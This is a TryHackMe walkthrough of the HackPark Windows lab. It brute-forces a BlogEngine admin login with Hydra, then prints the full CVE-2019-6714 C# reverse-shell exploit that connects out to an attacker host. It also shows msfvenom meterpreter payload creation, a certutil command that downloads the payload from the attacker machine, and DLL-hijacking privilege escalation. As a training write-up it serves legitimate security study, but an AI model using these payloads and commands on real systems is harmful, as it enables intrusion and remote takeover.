Categories: walkthrough
Tags: tryhackme, thm, Windows-Machine, bruteforce, login-bruteforce, hydra, CVE-2019-6714, BlogEngine, PrivEsc-Windows, PrivEsc, DLL-Hijacking, Juicy-Potato
$ nmap -p0-65535 10.10.88.187 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:01 IST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.73% done; ETC: 17:06 (0:03:52 remaining)
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 216.20 seconds
$ nmap -sV -sC -p80,3389 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 17:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2021-06-30T11:22:49
|_Not valid after: 2021-12-30T11:22:49
|_ssl-date: 2021-07-01T11:37:45+00:00; -4s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.07 seconds
When we inspect the pages there is nothing fruitful found
Injection attacks didn’t yield any fruit full results on input forms
From the URL
, we can observe that one of the parameter is admin
.
Lets use it as username and try to perform brute force attack
Using Burp
Using one of the password list from Seclists. We got the password 1qaz2wsx
Using Hydra
$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt 10.10.88.187 http-post-form '/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-01 19:53:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:1/p:100), ~7 tries per task
[DATA] attacking http-post-form://10.10.88.187:80/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=qRY6dWng1F0cvqSV%2B4mQfRmxND5Ksw%2F6QtVhc%2FlkK3Vze3sRlKmX4tRKwROr3YZ%2Fa%2FwPPHHBDTmbZMGyqx3xjyB8518U%2F3xHggxcrZ%2BsYOK2OOyWTkNa1cwmJuDw1zkcwpzMRThR1PK3cMJ1%2BRZVuFz41QR4mLQ9jiBDS6rJG0oLSXO9trFqrxZhCzdGQ9NikJJhbEbkNLQdSVipgvGTYZ1lXqYfp%2BtJ4F43RqGZFrbPC6%2B2qFb7DPSU%2BlTzrX9wghEicFDp5T7RjuPMpXBgsylp7dSQB8ytzrrj0T%2BwfKQQuo1vJrLdUx%2Ff64MiEMuQ1pm%2FkGp7Hdu71TpshTI3D8SfmTCOXBPJEkztx%2FU8SZ4HOTiy&__EVENTVALIDATION=R%2BihqyiDlyMMnTQiDQbY83J%2FICfBn9zcT1n09t%2FNzwUShryVjKW8K7ix2NU2GcsolWVjNwNUPoEFuONe7nCT3ZY9ul6zQiwlKAn53pdKEiUv9w4PXuXvzemSpYtaeUxuw%2FhRD%2B4vf7Is5h5%2Fdw4mLLawu9Vk8MKPMEfrI226GwQVZCei&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[80][http-post-form] host: 10.10.88.187 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-01 19:53:18
Username: admin
Password: 1qaz2wsx
we can use the credentials in login form. we will be greeted with Administrator Dashboard
RDP is not vulnerable
$ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.10.88.187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 19:07 IST
Nmap scan report for 10.10.88.187
Host is up (0.36s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
|_ RDSTLS: SUCCESS
Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
We can do brute force attack. But it may lead to account lockouts. Lets keep this as last resort
As we examine the Administrator Dashboard.
In the about page, we can find the blogengine.net version number 3.3.6.0
With some google dorking, we can find the this version is vulnerable to remote code execution / Directory traversal with CVE-2019-6714
Lets use this exploit code to get our shell
Payload Code:
# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
# Date: 02-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
# Version: <= 3.3.6
# Tested on: Windows 2016 Standard / IIS 10.0
# CVE : CVE-2019-6714
/*
* CVE-2019-6714
*
* Path traversal vulnerability leading to remote code execution. This
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. This
* is caused by an unchecked "theme" parameter that is used to override
* the default theme for rendering blog pages. The vulnerable code can
* be seen in this file:
*
* /Custom/Controls/PostList.ascx.cs
*
* Attack:
*
* First, we set the TcpClient address and port within the method below to
* our attack host, who has a reverse tcp listener waiting for a connection.
* Next, we upload this file through the file manager. In the current (3.3.6)
* version of BlogEngine, this is done by editing a post and clicking on the
* icon that looks like an open file in the toolbar. Note that this file must
* be uploaded as PostView.ascx. Once uploaded, the file will be in the
* /App_Data/files directory off of the document root. The admin page that
* allows upload is:
*
* http://10.10.10.10/admin/app/editor/editpost.cshtml
*
*
* Finally, the vulnerability is triggered by accessing the base URL for the
* blog with a theme override specified like so:
*
* http://10.10.10.10/?theme=../../App_Data/files
*
*/
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
static System.IO.StreamWriter streamWriter;
protected override void OnLoad(EventArgs e) {
base.OnLoad(e);
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
using(System.IO.Stream stream = client.GetStream()) {
using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
streamWriter = new System.IO.StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
Do the tweaking’s to payload and Save the payload as PostView.ascx
Using the URL upload the file:
http://10.10.88.187/admin/app/editor/editpost.cshtml
Open the listner and go to this URL to get the reverse shell on listner
http://10.10.88.187/?theme=../../App_Data/files
Getting Proper Stabilized shell
Create payload using msfvenom
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.39.244 LPORT=9866 -f exe -o revshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: revshell.exe
copy it to target
c:\Users\Public>certutil -urlcache -f http://10.11.39.244:8991/revshell.exe revshell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
Grabbing the shell
Using winpeas
for checking possible PrivEsc tactics
By running winpeas, we got to know that SystemScheduler
folder r/w access to everyone
We can try to stop the service, so that we can perform dll hijacking PrivEsc
After searching different types of logs in SystemScheduler folder, we got to know that Message.exe
is restarted every 30 seconds.
As the SystemScheduler
folder has world r/w access. Let’s created payload for Privileged Shell
Uploading the shell to target
On the listner, we got the connection
Getting User flag
Getting Root flag
Host is vulnerable to Juicy Potato attack too
More about Juicy Potato attack can be found in Alfred Walkthrough